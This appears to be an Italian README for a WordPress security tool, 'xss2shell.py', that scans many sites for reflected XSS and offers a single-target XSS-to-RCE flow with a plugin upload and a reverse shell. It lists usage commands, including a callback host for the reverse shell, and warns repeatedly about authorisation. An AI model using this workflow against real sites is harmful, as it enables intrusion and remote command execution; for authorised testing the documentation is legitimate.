
Scanner di sicurezza WordPress che identifica le versioni, rileva XSS riflessi su più obiettivi contemporaneamente e supporta un flusso di lavoro di exploit autenticato da XSS a RCE per test autorizzati.
Sviluppatore: Credito: YogaGymn
Utilità PoC/scanning per test di sicurezza autorizzati su WordPress. Il progetto contiene un flusso di sfruttamento per un target singolo e una modalità solo scan multi-target concorrente.
Importante: Utilizza questo progetto solo su installazioni WordPress di tua proprietà o per le quali hai esplicita autorizzazione a testare. Lo scanner multi-target è volutamente limitato all'identificazione della versione e al rilevamento della riflessione XSS; non esegue cattura di credenziali, upload di plugin o RCE contro un elenco di target.
Lo script originale supporta:
auto, xss e direct.Lo scanner aggiunto supporta:
ThreadPoolExecutor.La modalità multi-target non chiama le funzioni RCE originali.
requestsInstalla la dipendenza:
python3 -m pip install requests
Se la tua distribuzione Linux utilizza un ambiente Python gestito esternamente, usa un ambiente virtuale:
python3 -m venv .venv
source .venv/bin/activate
pip install requests
Clona o copia il progetto: originale dell'exploit yogaGymn
git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638
Oppure posiziona semplicemente:
xss2shell.py
nella tua directory di lavoro.
Crea un file chiamato targets.txt OU alvos.txt:
https://example1.test
https://example2.test
https://example3.test
Commenti e righe vuote vengono ignorati:
# Alvos de laboratório autorizado
https://example1.test
https://example2.test
Esegui lo scanner:
python3 xss2shell.py -i targets.txt
La concorrenza predefinita è di 10 worker.
Ad esempio, usa 20 worker:
python3 xss2shell.py -i targets.txt --workers 20
Per un piccolo laboratorio:
python3 xss2shell.py -i targets.txt --workers 5
Non scegliere un numero di worker inutilmente alto, perché potrebbe aumentare il carico di connessioni e attivare limiti di velocità o controlli difensivi.
python3 xss2shell.py \
-i targets.txt \
--workers 10 \
--output results.txt
[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE
[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)
=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected : 1
Not detected : 2
Errors : 0
Results saved : scan_results.txt
Il file predefinito scan_results.txt usa campi separati da tabulazioni:
TARGET WORDPRESS_VERSION XSS_STATUS XSS_DETAIL
Esempio:
https://example1.test 6.8.2 XSS_NOT_DETECTED ESCAPED
https://example2.test 6.7.1 XSS_REFLECTION_DETECTED AREA_BYPASS
Stato Significato
XSS_REFLECTION_DETECTED Lo scanner ha rilevato il
comportamento di riflessione HTML
testato. Non è di per sé una prova
di RCE.
XSS_NOT_DETECTED La riflessione testata non è stata
rilevata.
ERROR Il controllo ha riscontrato
un'eccezione.Lo scanner può riportare dettagli come:
RAW_HTMLAREA_BYPASSESCAPEDSTRIPPEDNOT_REFLECTEDQuesti valori descrivono la risposta osservata dalla routine di rilevamento; devono essere validati manualmente prima di considerare un risultato come una vulnerabilità confermata.
Lo script originale supporta anche argomenti per target singolo.
python3 xss2shell.py \
-u admin \
-p 'PASSWORD' \
http://authorized-target.test
python3 xss2shell.py \
--mode direct \
-u admin \
-p 'PASSWORD' \
http://authorized-target.test
python3 xss2shell.py \
--mode xss \
--lhost 192.0.2.10 \
http://authorized-lab.test
I flussi di lavoro XSS/diretti possono creare o attivare un plugin contenente funzionalità di esecuzione dei comandi. Usali solo in un ambiente di test autorizzato.
usage: xss2shell.py [-h]
[-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
[--mode {auto,xss,direct}]
[-u USERNAME] [-p PASSWORD]
[--lhost LHOST] [--lport LPORT]
[--slug SLUG] [--callback-port CALLBACK_PORT]
[--no-rev]
[target]
Argomento Descrizione
target URL del target singolo.
-i, --input File contenente più target.
--output File di output per i risultati
multi-target. Predefinito:
scan_results.txt.
--workers Numero di worker concorrenti.
Predefinito: 10.
--mode Modalità originale per target
singolo: auto, xss o direct.
-u, --username Nome utente WordPress per il flusso
di lavoro originale diretto/fallback.
-p, --password Password WordPress per il flusso
di lavoro originale diretto/fallback.
--lhost Host di callback/reverse-shell per il
PoC originale.
--lport Porta della reverse-shell. Predefinita:
4444.
--slug Slug del plugin. Predefinito:
xss2shell.
--callback-port Porta del server di callback.
Predefinita: 9090.
--no-rev Salta l'attivazione della
reverse-shell nel flusso di lavoro
originale.La modalità multi-target utilizza la seguente funzionalità di Python:
ThreadPoolExecutor
Ogni target viene inviato come attività di scansione indipendente:
targets.txt
|
v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ...
+----+----+----+----+
| | | |
v v v v
WP WP WP WP
XSS XSS XSS XSS
| | | |
+----+----+----+
|
v
scan_results.txt
I risultati vengono raccolti man mano che le attività vengono completate, mentre l'output finale viene generato seguendo l'ordine originale dei target.
La modalità multi-target è progettata per valutazioni di sicurezza autorizzate e ambienti di laboratorio.
Flusso di lavoro consigliato:
targets.txt.Non utilizzare lo scanner contro sistemi di terze parti senza autorizzazione.
Lo scanner non è uno strumento completo di valutazione delle vulnerabilità.
In particolare:
unknown (sconosciuto) non significa che il target sia vulnerabile..
├── xss2shell.py
├── targets.txt
└── scan_results.txt
Non erano presenti informazioni sulla licenza nel codice sorgente fornito.
Se questo progetto viene pubblicato pubblicamente, aggiungi un file di licenza esplicito, come LICENSE. Questo codice è uno sviluppo successivo del codice originale di ZSecurity.